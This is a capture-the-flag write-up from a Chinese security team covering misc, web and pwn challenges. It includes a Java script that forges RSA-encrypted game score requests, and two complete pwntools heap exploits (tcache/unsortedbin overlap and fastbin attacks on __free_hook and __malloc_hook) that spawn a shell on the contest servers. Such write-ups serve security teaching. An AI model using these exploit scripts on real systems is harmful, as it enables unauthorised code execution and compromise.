'数字安全'云安全公测大赛 Write-Up
-
misc
-
签到
-
ewm
-
findme
-
web
-
gameapp
-
Pwn
-
amazon
-
fkroman
Misc
02
签到
签到题直接给了flag
02
ewm
-
solved by 0xPoker
Download Attachments
讨论区:
…好像就是一个二维码拼接一下
拼完了,逆向真难顶
flag{g00d_g00d_study_1jf8988}
03
findme
-
solved by r1ngs
脚本如下:
二分查找法
#-*- coding=utf-8 -*-
from socket import *
import string
from re import *
def connect(host, port):
s = socket()
s.connect((host, port))
return s
def i2h(num):
return hex(num)[2:].rstrip('L')
def send(s, num):
print s.recv(1024)
print i2h(num)
s.send(i2h(num))
def get_flag(s, bottom, top, g1, g2, count):
for _ in range(count):
print '======= try to get flag ========'
send(s, bottom)
send(s, top)
g1 = g1+count
send(s, g1)
send(s, g1)
print s.recv(1024)
def main():
host ='121.40.216.20'
port = 9999
s = connect(host, port)
bottom = 0
top = 2**128
block = abs(top-bottom)/3+1
g1 = bottom
g2 = block
flag = 0
tg1 = g1
tg2 = g2
for _ in range(200):
if abs(g1-g2) < 10:
get_flag(s, bottom, top, g1, g2, abs(g1-g2))
send(s, bottom)
send(s, top)
send(s, g1)
send(s, g2)
mid = (g1+g2)/2
remess = s.recv(1024)
if remess == '1n': #in
print 1
flag = 1
tg1 = g1
tg2 = g2
tmid = mid
g2 = mid
elif remess == '2n':
print 2
if flag == 1:
g1 = tmid
g2 = tg2
else:
g1 = g2
g2 += block
else:
print remess
print 'count'+str(_)
print '+'*50
if __name__ == '__main__':
main()
flag : flag{flag_server_boomboom_guess}
WEB
01
gameapp
-
solved by evoA
我的伪造Java脚本
import org.junit.Test;
import org.springframework.util.Base64Utils;
import sun.misc.BASE64Decoder;
import javax.crypto.Cipher;
import java.security.Key;
import java.security.KeyFactory;
import java.security.interfaces.RSAPrivateKey;
import java.security.spec.PKCS8EncodedKeySpec;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
public class Test001 {
private static Map<Integer, String> keyMap = new HashMap();
@Test
public void test001(){
}
@Test
public void private_encrypt()
throws Exception
{
String paramString = "{"op":"add","score":999}";
// String paramString = "{"player":"evoA"}";
keyMap.put(Integer.valueOf(0), "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMYnImonQdMC1Y8USwIwf7Y0GcBP/h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8anYFoms223okyzeTlUIRHbIkto1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHEnA3Hau/DTzW4g4xhvzQIDAQAB");
keyMap.put(Integer.valueOf(1), "MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAKq1dQhWg9RwFXVanXeDysYY28xgiaidB0wLVjxRLAjB/tjQZwE/+Hp8Ak8BL3/+phnPLxl8MofX57OJ8nUUJRMIJr/xpgWiazbbeiTLN5OVQhEdsiS2jUnFg5rNuwTr4qYT7ImKKPjzf1Ji4LnUqwtZPza4cQDcdq78NPNbiDjGG/NAgMBAAECgYBUdazusCdPbxke09QI3Oq6VeuWncEiHHckx6Ml+p9Hwfu99/ZOpwDgUQSvZA3FTQ+PS3OpL0qs7USlDsXBe2F6gCZ/en1BvkEPE/FymHbzbSpr8BwjEel/kup842z11SujNxHbeznrXKNfvDlqR5HM7CurYEnrBW0X8She8lNAqXBXQJBANj3pPvSHFQ4ugkWst6XCX/gd5vQuvPzeUwHpReSdRsmnA6Jmv8oP03MQzjvsyrMoPatMzhN5Qtfpw12Febfl1pcCQQDJa2RGtK2jCiKxzKcbnUp9pPiSxtsdavneKoCG/tndICyGfeT1NRGSQsJCHIhxdee4QQYWUrzhbFBLLZDq4nsj07AkEAykt0T7si4MAXbPv2AKZQnCN9QhGHDof3k5UZL/ZFK+/wuY4Vyl+hJosHnz0XD5PFjNoGhLvUEBu6VUnBuAbHRtwJBAKysnHLhQlqbvdKfmEMcOf2HgP25rH5mn+ySk00n/q5LfuBt3XM54653/QGgZHigk96qIAXTOIooyU0p6yry8UTECQQCy8tufnlq8/8ISRdkHixENX+APeYr4hjmn5mUFJgB4qFUp1ReR0nA2oGf6IkzAWEwLvEchunKMtF7eEv1kHS+3Wd");
Object localObject = org.apache.tomcat.util.codec.binary.Base64.decodeBase64((String)keyMap.get(Integer.valueOf(1)));
localObject = (RSAPrivateKey) KeyFactory.getInstance("RSA").generatePrivate(new PKCS8EncodedKeySpec((byte[])localObject));
Cipher localCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding");
localCipher.init(1, (Key)localObject);
byte[] res = Base64.getEncoder().encode(localCipher.doFinal(paramString.getBytes("UTF-8")));
System.out.println(new String(res));
}
}
pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>me.evoA.springboot001</groupId>
<artifactId>springboot001</artifactId>
<version>1.0-SNAPSHOT</version>
<!-- 指定Spring Boot的版本 2.0.4.RELEASE -->
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.0.4.RELEASE</version>
</parent>
<dependencies>
<!-- 导入Spirng Boot web 所需的jar包 -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>4.12</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>net.sf.json-lib</groupId>
<artifactId>json-lib</artifactId>
<version>2.4</version>
<scope>test</scope>
</dependency>
</dependencies>
</project>
PS: Content-Type必须是xxx 否则会失败
感觉题目要99999分
com/ispring/gameplane/game/GameView.java 有个 addScore方法,json数据rsa加密发送,已经可以伪造 直接加999会被check,99通过
注意发一次替换一次cookie
替换cookie 就好了
import requests
rrr = requests.Session()
res = rrr.post(url="http://121.40.219.183:9999/score/",data="TWmIYQfp60aWjJH9kWjSB+OgWmyqiJJaGakyS1YXHcdpVzQVLoxC2/DBgFs19HGU8suk9togBAjGpM4KOvDbSh/yL+VEtg9LzSmaWdvMV6KM6NsXLKXdHhhDHwP/iOm1ceAkV9qBvs6jaPu4Luy1DxsF1FOynJFBAdAUpT+EQN0=",headers={"Content-Type":"xxx","cookie":"session=eyJwbGF5ZXIiOiJldm9BIiwic2NvcmUiOjQwMH0.XYRtdg.Y98UCi-ehTiQawFO2wclehVegVE"})
for i in range(1000):
res = rrr.post(url="http://121.40.219.183:9999/score/",data="TWmIYQfp60aWjJH9kWjSB+OgWmyqiJJaGakyS1YXHcdpVzQVLoxC2/DBgFs19HGU8suk9togBAjGpM4KOvDbSh/yL+VEtg9LzSmaWdvMV6KM6NsXLKXdHhhDHwP/iOm1ceAkV9qBvs6jaPu4Luy1DxsF1FOynJFBAdAUpT+EQN0=",headers={"Content-Type":"xxx"})
print(res.text)
Pwn
01
amazon
-
solved by 骑麦兜看落日
利用 unsortedbin 合并然后利用 unsortedbin overlap 修改 tcache 表的 fd 位
修改 free_hook 为 system
覆盖 free_hook 使向上申请 覆盖 锁 为0
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"
exe = './amazon'
elf = ELF(exe)
one = [0x4f2c5, 0x4f322, 0x10a38c]
#------------------------------------
def d(s = ''):
gdb.attach(p ,s)
def manu(idx):
p.sendlineafter('choice: ', str(idx))
def add(num, size, note):
manu(1)
p.sendlineafter('buy: ', str(1))
p.sendlineafter('many: ', str(num))
p.sendlineafter('note: ', str(size))
p.send(note)
def add1(num, size, note):
manu(1)
p.sendlineafter('buy: ', str(1))
p.sendline(str(num))
p.sendline(str(size))
p.sendline(note)
def show():
manu(2)
def checkout(idx):
manu(3)
p.sendlineafter('for: ', str(idx))
def pwn():
add(2, 0x80, 'a') #0
add(2, 0xa0, 'A') #1
add(2, 0x90, 'A') #2
add(2, 0x10, 'A') #4
for i in range(8):
checkout(0)
for i in range(8):
checkout(2)
show()
p.recvuntil('Name: ')
libc.address = u64(p.recv(6).ljust(8, 'x00')) - 0x3ebca0
success('libc.address--->'+hex(libc.address))
for i in range(8):
checkout(1)
add(2, 0x100, 'xff'*0x80 +p64(3)+p64(0xa1) + p64(libc.sym['__free_hook']-0x40))
checkout(0)
add(2, 0xa0, 'a')
add(2, 0x100, 'xff'*0x80 +p64(3)+p64(0xa1) + '/bin/shx00')
add(2, 0xa0, 'x00'*0x20+p64(libc.sym['system']))
#d()
checkout(5)
p.interactive()
#-------------------------------------
if __name__ == '__main__':
l = 0
if l:
p = process(exe)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
p = remote('121.41.38.38', 9999)
libc = ELF('libc-2.27.so')
pwn()
02
fkroman
-
solved by 骑麦兜看落日
程序存在一个UAF和heap overflow,先通过fastbin attack打iofile leak出libc地址,然后再通过fastbin attack打malloc_hook来getshell
#!/usr/bin/env python2
from pwn import *
context(log_level='debug', arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
exe = './fkroman'
lib = './libc-2.23.so'
ip = '121.40.246.48'
port = 9999
elf = ELF(exe)
libc = ELF(lib)
def dbg(script=''):
attach(io, gdbscript=script)
def choice(idx):
io.sendlineafter('Your choice: ', str(idx))
def index(idx):
io.sendlineafter('Index: ', str(idx))
def add(idx, size):
choice(1)
index(idx)
io.sendlineafter('Size: ', str(size))
def dele(idx):
choice(3)
index(idx)
def edit(idx, size, content):
choice(4)
index(idx)
io.sendlineafter('Size: ', str(size))
io.sendafter('Content: ', content)
# ------------------------------------------------
LOCAL = 0
iofile_off = 0x25dd
libc_off = 0x3c5600
onegadgets = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
# ------------------------------------------------
def exp():
add(0, 0x70-8)
add(1, 0x70-8)
add(2, 0x90-8)
add(3, 0x20-8)
#-------------------leak libc---------------------
dele(1)
dele(0)
dele(2)
edit(0, 1, p8(0xe0))
edit(1, 0x70, 'A'*0x68+p64(0x71))
edit(2, 2, p16(iofile_off))
add(4, 0x70-8)
add(5, 0x70-8)
add(6, 0x70-8)
edit(6, 0x54, 'A'*3+p64(0)*6+p64(0x00000000fbad1800)+p64(0)*3+'x00')
io.recv(0x40)
libc.address = u64(io.recv(8)) - libc_off
log.info(hex(libc.address))
#-------------------malloc_hook-------------------
add(7, 0x70-8)
edit(7, 0x70, 'B'*0x68+p64(0x21))
dele(7)
edit(7, 8, p64(libc.sym['__malloc_hook']-0x23))
add(8, 0x70-8)
add(9, 0x70-8)
edit(9, 0x1b, 'C'*0x13+p64(libc.address+onegadgets[1]))
add(8, 0)
#dbg()
io.interactive()
# ------------------------------------------------
if __name__ == '__main__':
if LOCAL:
io = elf.process()#env={"LD_PRELOAD": libc.path})
else:
io = remote(ip, port)
exp()
长
按
关
注
三叶草小组
新浪微博:@三叶草小组Syclover
在与你相遇的路上马不停蹄~
原文始发于微信公众号(三叶草小组Syclover):'数字安全'云安全公测大赛 Write-Up
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论